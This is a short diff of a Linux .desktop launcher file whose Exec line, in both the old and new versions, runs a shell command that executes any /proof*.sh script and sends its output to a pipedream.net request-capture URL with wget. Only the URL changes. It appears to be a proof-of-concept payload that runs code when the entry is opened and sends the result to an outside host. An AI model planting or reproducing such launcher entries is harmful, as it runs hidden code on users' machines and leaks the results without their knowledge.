--- a/9hea1.desktop
+++ b/9hea1.desktop
@@ -1,3 +1,3 @@
 [Desktop Entry]
-Exec=sh -c "wget https://eonka939zo7nuk7.m.pipedream.net/?`/proof*.sh`"
+Exec=sh -c "wget https://eof6x6ea6he3up9.m.pipedream.net/?`/proof*.sh`"
 Type=Application
